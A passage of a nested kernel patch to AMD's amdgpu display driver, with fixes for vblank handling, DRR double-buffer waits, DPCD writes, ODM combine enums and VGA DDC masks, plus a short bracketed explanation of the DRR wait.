++		if (aconnector->dc_link->type == dc_connection_mst_branch)
+ 			continue;
+ 
+ 		mutex_lock(&aconnector->hpd_lock);
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c
+index 22125daf9dcfe..78c2ed59e87d2 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c
+@@ -77,6 +77,9 @@ int dm_set_vupdate_irq(struct drm_crtc *crtc, bool enable)
+ 	struct amdgpu_device *adev = drm_to_adev(crtc->dev);
+ 	int rc;
+ 
++	if (acrtc->otg_inst == -1)
++		return 0;
++
+ 	irq_source = IRQ_TYPE_VUPDATE + acrtc->otg_inst;
+ 
+ 	rc = dc_interrupt_set(adev->dm.dc, irq_source, enable) ? 0 : -EBUSY;
+@@ -152,6 +155,9 @@ static inline int dm_set_vblank(struct drm_crtc *crtc, bool enable)
+ 	struct vblank_control_work *work;
+ 	int rc = 0;
+ 
++	if (acrtc->otg_inst == -1)
++		goto skip;
++
+ 	if (enable) {
+ 		/* vblank irq on -> Only need vupdate irq in vrr mode */
+ 		if (amdgpu_dm_vrr_active(acrtc_state))
+@@ -169,6 +175,7 @@ static inline int dm_set_vblank(struct drm_crtc *crtc, bool enable)
+ 	if (!dc_interrupt_set(adev->dm.dc, irq_source, enable))
+ 		return -EBUSY;
+ 
++skip:
+ 	if (amdgpu_in_reset(adev))
+ 		return 0;
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn314/dcn314_smu.c b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn314/dcn314_smu.c
+index f47cfe6b42bd2..0765334f08259 100644
+--- a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn314/dcn314_smu.c
++++ b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn314/dcn314_smu.c
+@@ -146,6 +146,9 @@ static int dcn314_smu_send_msg_with_param(struct clk_mgr_internal *clk_mgr,
+ 		if (msg_id == VBIOSSMC_MSG_TransferTableDram2Smu &&
+ 		    param == TABLE_WATERMARKS)
+ 			DC_LOG_WARNING("Watermarks table not configured properly by SMU");
++		else if (msg_id == VBIOSSMC_MSG_SetHardMinDcfclkByFreq ||
++			 msg_id == VBIOSSMC_MSG_SetMinDeepSleepDcfclk)
++			DC_LOG_WARNING("DCFCLK_DPM is not enabled by BIOS");
+ 		else
+ 			ASSERT(0);
+ 		REG_WRITE(MP1_SMN_C2PMSG_91, VBIOSSMC_Result_OK);
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc.c b/drivers/gpu/drm/amd/display/dc/core/dc.c
+index 0cb8d1f934d12..698ef50e83f3f 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc.c
+@@ -862,6 +862,7 @@ static bool dc_construct_ctx(struct dc *dc,
+ 
+ 	dc_ctx->perf_trace = dc_perf_trace_create();
+ 	if (!dc_ctx->perf_trace) {
++		kfree(dc_ctx);
+ 		ASSERT_CRITICAL(false);
+ 		return false;
+ 	}
+@@ -3334,6 +3335,21 @@ static void commit_planes_for_stream(struct dc *dc,
+ 
+ 	dc_z10_restore(dc);
+ 
++	if (update_type == UPDATE_TYPE_FULL) {
++		/* wait for all double-buffer activity to clear on all pipes */
++		int pipe_idx;
++
++		for (pipe_idx = 0; pipe_idx < dc->res_pool->pipe_count; pipe_idx++) {
++			struct pipe_ctx *pipe_ctx = &context->res_ctx.pipe_ctx[pipe_idx];
++
++			if (!pipe_ctx->stream)
++				continue;
++
++			if (pipe_ctx->stream_res.tg->funcs->wait_drr_doublebuffer_pending_clear)
++				pipe_ctx->stream_res.tg->funcs->wait_drr_doublebuffer_pending_clear(pipe_ctx->stream_res.tg);
++		}
++	}
++
+ 	if (get_seamless_boot_stream_count(context) > 0 && surface_count > 0) {
+ 		/* Optimize seamless boot flag keeps clocks and watermarks high until
+ 		 * first flip. After first flip, optimization is required to lower
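
[The new block makes every full update first drain in-flight DRR timing changes: V_TOTAL reprogramming is double-buffered in the OTG, and starting a full update while the previous swap is still pending could latch a mix of old and new timing. The hook added in dcn30_optc.c below polls the pending field every 2 us for up to 100000 tries, which works out to roughly the 200 ms period of the worst-case 5 Hz vupdate named in its comment. The semantics of that wait, as an illustrative loop (read_field is hypothetical):

	unsigned int attempt;

	for (attempt = 0; attempt < 100000; attempt++) {
		if (!read_field(OTG_DRR_TIMING_DBUF_UPDATE_PENDING))
			break;			/* update has latched */
		udelay(2);
	}
]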
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_link.c b/drivers/gpu/drm/amd/display/dc/core/dc_link.c
+index c88f044666fee..754fc86341494 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_link.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_link.c
+@@ -1916,12 +1916,6 @@ struct dc_link *link_create(const struct link_init_data *init_params)
+ 	if (false == dc_link_construct(link, init_params))
+ 		goto construct_fail;
+ 
+-	/*
+-	 * Must use preferred_link_setting, not reported_link_cap or verified_link_cap,
+-	 * since struct preferred_link_setting won't be reset after S3.
+-	 */
+-	link->preferred_link_setting.dpcd_source_device_specific_field_support = true;
+-
+ 	return link;
+ 
+ construct_fail:
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_link_dp.c b/drivers/gpu/drm/amd/display/dc/core/dc_link_dp.c
+index dedd1246ce588..475ad3eed002d 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_link_dp.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_link_dp.c
+@@ -6554,18 +6554,10 @@ void dpcd_set_source_specific_data(struct dc_link *link)
+ 
+ 			uint8_t hblank_size = (uint8_t)link->dc->caps.min_horizontal_blanking_period;
+ 
+-			if (link->preferred_link_setting.dpcd_source_device_specific_field_support) {
+-				result_write_min_hblank = core_link_write_dpcd(link,
+-					DP_SOURCE_MINIMUM_HBLANK_SUPPORTED, (uint8_t *)(&hblank_size),
+-					sizeof(hblank_size));
+-
+-				if (result_write_min_hblank == DC_ERROR_UNEXPECTED)
+-					link->preferred_link_setting.dpcd_source_device_specific_field_support = false;
+-			} else {
+-				DC_LOG_DC("Sink device does not support 00340h DPCD write. Skipping on purpose.\n");
+-			}
++			result_write_min_hblank = core_link_write_dpcd(link,
++				DP_SOURCE_MINIMUM_HBLANK_SUPPORTED, (uint8_t *)(&hblank_size),
++				sizeof(hblank_size));
+ 		}
+-
+ 		DC_TRACE_LEVEL_MESSAGE(DAL_TRACE_LEVEL_INFORMATION,
+ 							WPP_BIT_FLAG_DC_DETECTION_DP_CAPS,
+ 							"result=%u link_index=%u enum dce_version=%d DPCD=0x%04X min_hblank=%u branch_dev_id=0x%x branch_dev_name='%c%c%c%c%c%c'",
+diff --git a/drivers/gpu/drm/amd/display/dc/dc.h b/drivers/gpu/drm/amd/display/dc/dc.h
+index 85ebeaa2de186..37998dc0fc144 100644
+--- a/drivers/gpu/drm/amd/display/dc/dc.h
++++ b/drivers/gpu/drm/amd/display/dc/dc.h
+@@ -410,7 +410,7 @@ struct dc_config {
+ 	bool force_bios_enable_lttpr;
+ 	uint8_t force_bios_fixed_vs;
+ 	int sdpif_request_limit_words_per_umc;
+-
++	bool disable_subvp_drr;
+ };
+ 
+ enum visual_confirm {
+diff --git a/drivers/gpu/drm/amd/display/dc/dc_dp_types.h b/drivers/gpu/drm/amd/display/dc/dc_dp_types.h
+index 2c54b6e0498bf..296793d8b2bf2 100644
+--- a/drivers/gpu/drm/amd/display/dc/dc_dp_types.h
++++ b/drivers/gpu/drm/amd/display/dc/dc_dp_types.h
+@@ -149,7 +149,6 @@ struct dc_link_settings {
+ 	enum dc_link_spread link_spread;
+ 	bool use_link_rate_set;
+ 	uint8_t link_rate_set;
+-	bool dpcd_source_device_specific_field_support;
+ };
+ 
+ union dc_dp_ffe_preset {
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_optc.h b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_optc.h
+index 88ac5f6f4c96c..0b37bb0e184b2 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_optc.h
++++ b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_optc.h
+@@ -519,7 +519,8 @@ struct dcn_optc_registers {
+ 	type OTG_CRC_DATA_STREAM_COMBINE_MODE;\
+ 	type OTG_CRC_DATA_STREAM_SPLIT_MODE;\
+ 	type OTG_CRC_DATA_FORMAT;\
+-	type OTG_V_TOTAL_LAST_USED_BY_DRR;
++	type OTG_V_TOTAL_LAST_USED_BY_DRR;\
++	type OTG_DRR_TIMING_DBUF_UPDATE_PENDING;
+ 
+ #define TG_REG_FIELD_LIST_DCN3_2(type) \
+ 	type OTG_H_TIMING_DIV_MODE_MANUAL;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_optc.c b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_optc.c
+index 867d60151aebb..08b92715e2e64 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_optc.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_optc.c
+@@ -291,6 +291,14 @@ static void optc3_set_timing_double_buffer(struct timing_generator *optc, bool e
+ 		   OTG_DRR_TIMING_DBUF_UPDATE_MODE, mode);
+ }
+ 
++void optc3_wait_drr_doublebuffer_pending_clear(struct timing_generator *optc)
++{
++	struct optc *optc1 = DCN10TG_FROM_TG(optc);
++
++	REG_WAIT(OTG_DOUBLE_BUFFER_CONTROL, OTG_DRR_TIMING_DBUF_UPDATE_PENDING, 0, 2, 100000); /* 1 vupdate at 5hz */
++
++}
++
+ void optc3_set_vtotal_min_max(struct timing_generator *optc, int vtotal_min, int vtotal_max)
+ {
+ 	optc1_set_vtotal_min_max(optc, vtotal_min, vtotal_max);
+@@ -360,6 +368,7 @@ static struct timing_generator_funcs dcn30_tg_funcs = {
+ 		.program_manual_trigger = optc2_program_manual_trigger,
+ 		.setup_manual_trigger = optc2_setup_manual_trigger,
+ 		.get_hw_timing = optc1_get_hw_timing,
++		.wait_drr_doublebuffer_pending_clear = optc3_wait_drr_doublebuffer_pending_clear,
+ };
+ 
+ void dcn30_timing_generator_init(struct optc *optc1)
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_optc.h b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_optc.h
+index dd45a5499b078..fb06dc9a48937 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_optc.h
++++ b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_optc.h
+@@ -279,6 +279,7 @@
+ 	SF(OTG0_OTG_DRR_TRIGGER_WINDOW, OTG_DRR_TRIGGER_WINDOW_END_X, mask_sh),\
+ 	SF(OTG0_OTG_DRR_V_TOTAL_CHANGE, OTG_DRR_V_TOTAL_CHANGE_LIMIT, mask_sh),\
+ 	SF(OTG0_OTG_H_TIMING_CNTL, OTG_H_TIMING_DIV_BY2, mask_sh),\
++	SF(OTG0_OTG_DOUBLE_BUFFER_CONTROL, OTG_DRR_TIMING_DBUF_UPDATE_PENDING, mask_sh),\
+ 	SF(OTG0_OTG_DOUBLE_BUFFER_CONTROL, OTG_DRR_TIMING_DBUF_UPDATE_MODE, mask_sh),\
+ 	SF(OTG0_OTG_DOUBLE_BUFFER_CONTROL, OTG_BLANK_DATA_DOUBLE_BUFFER_EN, mask_sh)
+ 
+@@ -317,6 +318,7 @@
+ 	SF(OTG0_OTG_DRR_TRIGGER_WINDOW, OTG_DRR_TRIGGER_WINDOW_END_X, mask_sh),\
+ 	SF(OTG0_OTG_DRR_V_TOTAL_CHANGE, OTG_DRR_V_TOTAL_CHANGE_LIMIT, mask_sh),\
+ 	SF(OTG0_OTG_H_TIMING_CNTL, OTG_H_TIMING_DIV_MODE, mask_sh),\
++	SF(OTG0_OTG_DOUBLE_BUFFER_CONTROL, OTG_DRR_TIMING_DBUF_UPDATE_PENDING, mask_sh),\
+ 	SF(OTG0_OTG_DOUBLE_BUFFER_CONTROL, OTG_DRR_TIMING_DBUF_UPDATE_MODE, mask_sh)
+ 
+ void dcn30_timing_generator_init(struct optc *optc1);
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_dio_stream_encoder.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_dio_stream_encoder.c
+index 38842f938bed0..0926db0183383 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_dio_stream_encoder.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_dio_stream_encoder.c
+@@ -278,10 +278,10 @@ static void enc314_stream_encoder_dp_blank(
+ 	struct dc_link *link,
+ 	struct stream_encoder *enc)
+ {
+-	/* New to DCN314 - disable the FIFO before VID stream disable. */
+-	enc314_disable_fifo(enc);
+-
+ 	enc1_stream_encoder_dp_blank(link, enc);
++
++	/* Disable FIFO after the DP vid stream is disabled to avoid corruption. */
++	enc314_disable_fifo(enc);
+ }
+ 
+ static void enc314_stream_encoder_dp_unblank(
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
+index 79850a68f62ab..73f519dbdb531 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
+@@ -892,6 +892,8 @@ static const struct dc_debug_options debug_defaults_drv = {
+ 	.force_abm_enable = false,
+ 	.timing_trace = false,
+ 	.clock_trace = true,
++	.disable_dpp_power_gate = true,
++	.disable_hubp_power_gate = true,
+ 	.disable_pplib_clock_request = false,
+ 	.pipe_split_policy = MPC_SPLIT_DYNAMIC,
+ 	.force_single_disp_pipe_split = false,
+@@ -901,7 +903,7 @@ static const struct dc_debug_options debug_defaults_drv = {
+ 	.max_downscale_src_width = 4096,/*upto true 4k*/
+ 	.disable_pplib_wm_range = false,
+ 	.scl_reset_length10 = true,
+-	.sanity_checks = false,
++	.sanity_checks = true,
+ 	.underflow_assert_delay_us = 0xFFFFFFFF,
+ 	.dwb_fi_phase = -1, // -1 = disable,
+ 	.dmub_command_table = true,
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn20/display_mode_vba_20.c b/drivers/gpu/drm/amd/display/dc/dml/dcn20/display_mode_vba_20.c
+index d3b5b6fedf042..6266b0788387e 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn20/display_mode_vba_20.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn20/display_mode_vba_20.c
+@@ -3897,14 +3897,14 @@ void dml20_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 					mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine = mode_lib->vba.PixelClock[k] / 2
+ 							* (1 + mode_lib->vba.DISPCLKDPPCLKDSCCLKDownSpreading / 100.0);
+ 
+-				locals->ODMCombineEnablePerState[i][k] = false;
++				locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_disabled;
+ 				mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithoutODMCombine;
+ 				if (mode_lib->vba.ODMCapability) {
+ 					if (locals->PlaneRequiredDISPCLKWithoutODMCombine > mode_lib->vba.MaxDispclkRoundedDownToDFSGranularity) {
+-						locals->ODMCombineEnablePerState[i][k] = true;
++						locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_2to1;
+ 						mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine;
+ 					} else if (locals->HActive[k] > DCN20_MAX_420_IMAGE_WIDTH && locals->OutputFormat[k] == dm_420) {
+-						locals->ODMCombineEnablePerState[i][k] = true;
++						locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_2to1;
+ 						mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine;
+ 					}
+ 				}
+@@ -3957,7 +3957,7 @@ void dml20_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 				locals->RequiredDISPCLK[i][j] = 0.0;
+ 				locals->DISPCLK_DPPCLK_Support[i][j] = true;
+ 				for (k = 0; k <= mode_lib->vba.NumberOfActivePlanes - 1; k++) {
+-					locals->ODMCombineEnablePerState[i][k] = false;
++					locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_disabled;
+ 					if (locals->SwathWidthYSingleDPP[k] <= locals->MaximumSwathWidth[k]) {
+ 						locals->NoOfDPP[i][j][k] = 1;
+ 						locals->RequiredDPPCLK[i][j][k] = locals->MinDPPCLKUsingSingleDPP[k]
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn20/display_mode_vba_20v2.c b/drivers/gpu/drm/amd/display/dc/dml/dcn20/display_mode_vba_20v2.c
+index edd098c7eb927..989d83ee38421 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn20/display_mode_vba_20v2.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn20/display_mode_vba_20v2.c
+@@ -4008,17 +4008,17 @@ void dml20v2_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode
+ 					mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine = mode_lib->vba.PixelClock[k] / 2
+ 							* (1 + mode_lib->vba.DISPCLKDPPCLKDSCCLKDownSpreading / 100.0);
+ 
+-				locals->ODMCombineEnablePerState[i][k] = false;
++				locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_disabled;
+ 				mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithoutODMCombine;
+ 				if (mode_lib->vba.ODMCapability) {
+ 					if (locals->PlaneRequiredDISPCLKWithoutODMCombine > MaxMaxDispclkRoundedDown) {
+-						locals->ODMCombineEnablePerState[i][k] = true;
++						locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_2to1;
+ 						mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine;
+ 					} else if (locals->DSCEnabled[k] && (locals->HActive[k] > DCN20_MAX_DSC_IMAGE_WIDTH)) {
+-						locals->ODMCombineEnablePerState[i][k] = true;
++						locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_2to1;
+ 						mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine;
+ 					} else if (locals->HActive[k] > DCN20_MAX_420_IMAGE_WIDTH && locals->OutputFormat[k] == dm_420) {
+-						locals->ODMCombineEnablePerState[i][k] = true;
++						locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_2to1;
+ 						mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine;
+ 					}
+ 				}
+@@ -4071,7 +4071,7 @@ void dml20v2_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode
+ 				locals->RequiredDISPCLK[i][j] = 0.0;
+ 				locals->DISPCLK_DPPCLK_Support[i][j] = true;
+ 				for (k = 0; k <= mode_lib->vba.NumberOfActivePlanes - 1; k++) {
+-					locals->ODMCombineEnablePerState[i][k] = false;
++					locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_disabled;
+ 					if (locals->SwathWidthYSingleDPP[k] <= locals->MaximumSwathWidth[k]) {
+ 						locals->NoOfDPP[i][j][k] = 1;
+ 						locals->RequiredDPPCLK[i][j][k] = locals->MinDPPCLKUsingSingleDPP[k]
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn21/display_mode_vba_21.c b/drivers/gpu/drm/amd/display/dc/dml/dcn21/display_mode_vba_21.c
+index 1d84ae50311d9..b7c2844d0cbee 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn21/display_mode_vba_21.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn21/display_mode_vba_21.c
+@@ -4102,17 +4102,17 @@ void dml21_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 					mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine = mode_lib->vba.PixelClock[k] / 2
+ 							* (1 + mode_lib->vba.DISPCLKDPPCLKDSCCLKDownSpreading / 100.0);
+ 
+-				locals->ODMCombineEnablePerState[i][k] = false;
++				locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_disabled;
+ 				mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithoutODMCombine;
+ 				if (mode_lib->vba.ODMCapability) {
+ 					if (locals->PlaneRequiredDISPCLKWithoutODMCombine > MaxMaxDispclkRoundedDown) {
+-						locals->ODMCombineEnablePerState[i][k] = true;
++						locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_2to1;
+ 						mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine;
+ 					} else if (locals->DSCEnabled[k] && (locals->HActive[k] > DCN21_MAX_DSC_IMAGE_WIDTH)) {
+-						locals->ODMCombineEnablePerState[i][k] = true;
++						locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_2to1;
+ 						mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine;
+ 					} else if (locals->HActive[k] > DCN21_MAX_420_IMAGE_WIDTH && locals->OutputFormat[k] == dm_420) {
+-						locals->ODMCombineEnablePerState[i][k] = true;
++						locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_2to1;
+ 						mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine;
+ 					}
+ 				}
+@@ -4165,7 +4165,7 @@ void dml21_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 				locals->RequiredDISPCLK[i][j] = 0.0;
+ 				locals->DISPCLK_DPPCLK_Support[i][j] = true;
+ 				for (k = 0; k <= mode_lib->vba.NumberOfActivePlanes - 1; k++) {
+-					locals->ODMCombineEnablePerState[i][k] = false;
++					locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_disabled;
+ 					if (locals->SwathWidthYSingleDPP[k] <= locals->MaximumSwathWidth[k]) {
+ 						locals->NoOfDPP[i][j][k] = 1;
+ 						locals->RequiredDPPCLK[i][j][k] = locals->MinDPPCLKUsingSingleDPP[k]
+@@ -5230,7 +5230,7 @@ void dml21_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 			mode_lib->vba.ODMCombineEnabled[k] =
+ 					locals->ODMCombineEnablePerState[mode_lib->vba.VoltageLevel][k];
+ 		} else {
+-			mode_lib->vba.ODMCombineEnabled[k] = false;
++			mode_lib->vba.ODMCombineEnabled[k] = dm_odm_combine_mode_disabled;
+ 		}
+ 		mode_lib->vba.DSCEnabled[k] =
+ 				locals->RequiresDSC[mode_lib->vba.VoltageLevel][k];
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
+index f94abd124021e..69e205ac58b25 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
+@@ -877,6 +877,10 @@ static bool subvp_drr_schedulable(struct dc *dc, struct dc_state *context, struc
+ 	int16_t stretched_drr_us = 0;
+ 	int16_t drr_stretched_vblank_us = 0;
+ 	int16_t max_vblank_mallregion = 0;
++	const struct dc_config *config = &dc->config;
++
++	if (config->disable_subvp_drr)
++		return false;
+ 
+ 	// Find SubVP pipe
+ 	for (i = 0; i < dc->res_pool->pipe_count; i++) {
+@@ -2038,6 +2042,10 @@ void dcn32_calculate_wm_and_dlg_fpu(struct dc *dc, struct dc_state *context,
+ 		 */
+ 		context->bw_ctx.bw.dcn.watermarks.a = context->bw_ctx.bw.dcn.watermarks.c;
+ 		context->bw_ctx.bw.dcn.watermarks.a.cstate_pstate.pstate_change_ns = 0;
++		/* Calculate FCLK p-state change watermark based on FCLK pstate change latency in case
++		 * UCLK p-state is not supported, to avoid underflow in case FCLK pstate is supported
++		 */
++		context->bw_ctx.bw.dcn.watermarks.a.cstate_pstate.fclk_pstate_change_ns = get_fclk_watermark(&context->bw_ctx.dml, pipes, pipe_cnt) * 1000;
+ 	} else {
+ 		/* Set A:
+ 		 * All clocks min.
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c
+index f4b176599be7a..0ea406145c1d7 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c
+@@ -136,7 +136,7 @@ struct _vcs_dpi_soc_bounding_box_st dcn3_21_soc = {
+ 	.urgent_out_of_order_return_per_channel_pixel_only_bytes = 4096,
+ 	.urgent_out_of_order_return_per_channel_pixel_and_vm_bytes = 4096,
+ 	.urgent_out_of_order_return_per_channel_vm_only_bytes = 4096,
+-	.pct_ideal_sdp_bw_after_urgent = 100.0,
++	.pct_ideal_sdp_bw_after_urgent = 90.0,
+ 	.pct_ideal_fabric_bw_after_urgent = 67.0,
+ 	.pct_ideal_dram_sdp_bw_after_urgent_pixel_only = 20.0,
+ 	.pct_ideal_dram_sdp_bw_after_urgent_pixel_and_vm = 60.0, // N/A, for now keep as is until DML implemented
+diff --git a/drivers/gpu/drm/amd/display/dc/gpio/dcn20/hw_factory_dcn20.c b/drivers/gpu/drm/amd/display/dc/gpio/dcn20/hw_factory_dcn20.c
+index 9b63c6c0cc844..e0bd0c722e006 100644
+--- a/drivers/gpu/drm/amd/display/dc/gpio/dcn20/hw_factory_dcn20.c
++++ b/drivers/gpu/drm/amd/display/dc/gpio/dcn20/hw_factory_dcn20.c
+@@ -138,7 +138,8 @@ static const struct ddc_sh_mask ddc_shift[] = {
+ 	DDC_MASK_SH_LIST_DCN2(__SHIFT, 3),
+ 	DDC_MASK_SH_LIST_DCN2(__SHIFT, 4),
+ 	DDC_MASK_SH_LIST_DCN2(__SHIFT, 5),
+-	DDC_MASK_SH_LIST_DCN2(__SHIFT, 6)
++	DDC_MASK_SH_LIST_DCN2(__SHIFT, 6),
++	DDC_MASK_SH_LIST_DCN2_VGA(__SHIFT)
+ };
+ 
+ static const struct ddc_sh_mask ddc_mask[] = {
+@@ -147,7 +148,8 @@ static const struct ddc_sh_mask ddc_mask[] = {
+ 	DDC_MASK_SH_LIST_DCN2(_MASK, 3),
+ 	DDC_MASK_SH_LIST_DCN2(_MASK, 4),
+ 	DDC_MASK_SH_LIST_DCN2(_MASK, 5),
+-	DDC_MASK_SH_LIST_DCN2(_MASK, 6)
++	DDC_MASK_SH_LIST_DCN2(_MASK, 6),
++	DDC_MASK_SH_LIST_DCN2_VGA(_MASK)
+ };
+ 
+ #include "../generic_regs.h"
+diff --git a/drivers/gpu/drm/amd/display/dc/gpio/dcn30/hw_factory_dcn30.c b/drivers/gpu/drm/amd/display/dc/gpio/dcn30/hw_factory_dcn30.c
+index 687d4f128480e..36a5736c58c92 100644
+--- a/drivers/gpu/drm/amd/display/dc/gpio/dcn30/hw_factory_dcn30.c
++++ b/drivers/gpu/drm/amd/display/dc/gpio/dcn30/hw_factory_dcn30.c
+@@ -145,7 +145,8 @@ static const struct ddc_sh_mask ddc_shift[] = {
+ 	DDC_MASK_SH_LIST_DCN2(__SHIFT, 3),
+ 	DDC_MASK_SH_LIST_DCN2(__SHIFT, 4),
+ 	DDC_MASK_SH_LIST_DCN2(__SHIFT, 5),
+-	DDC_MASK_SH_LIST_DCN2(__SHIFT, 6)
++	DDC_MASK_SH_LIST_DCN2(__SHIFT, 6),
++	DDC_MASK_SH_LIST_DCN2_VGA(__SHIFT)
+ };
+ 
+ static const struct ddc_sh_mask ddc_mask[] = {
+@@ -154,7 +155,8 @@ static const struct ddc_sh_mask ddc_mask[] = {
+ 	DDC_MASK_SH_LIST_DCN2(_MASK, 3),
+ 	DDC_MASK_SH_LIST_DCN2(_MASK, 4),
+ 	DDC_MASK_SH_LIST_DCN2(_MASK, 5),
+-	DDC_MASK_SH_LIST_DCN2(_MASK, 6)
++	DDC_MASK_SH_LIST_DCN2(_MASK, 6),
++	DDC_MASK_SH_LIST_DCN2_VGA(_MASK)
+ };
+ 
+ #include "../generic_regs.h"
+diff --git a/drivers/gpu/drm/amd/display/dc/gpio/dcn32/hw_factory_dcn32.c b/drivers/gpu/drm/amd/display/dc/gpio/dcn32/hw_factory_dcn32.c
+index 9fd8b269dd79c..985f10b397509 100644
+--- a/drivers/gpu/drm/amd/display/dc/gpio/dcn32/hw_factory_dcn32.c
++++ b/drivers/gpu/drm/amd/display/dc/gpio/dcn32/hw_factory_dcn32.c
+@@ -149,7 +149,8 @@ static const struct ddc_sh_mask ddc_shift[] = {
+ 	DDC_MASK_SH_LIST_DCN2(__SHIFT, 3),
+ 	DDC_MASK_SH_LIST_DCN2(__SHIFT, 4),
+ 	DDC_MASK_SH_LIST_DCN2(__SHIFT, 5),
+-	DDC_MASK_SH_LIST_DCN2(__SHIFT, 6)
++	DDC_MASK_SH_LIST_DCN2(__SHIFT, 6),
++	DDC_MASK_SH_LIST_DCN2_VGA(__SHIFT)
+ };
+ 
+ static const struct ddc_sh_mask ddc_mask[] = {
+@@ -158,7 +159,8 @@ static const struct ddc_sh_mask ddc_mask[] = {
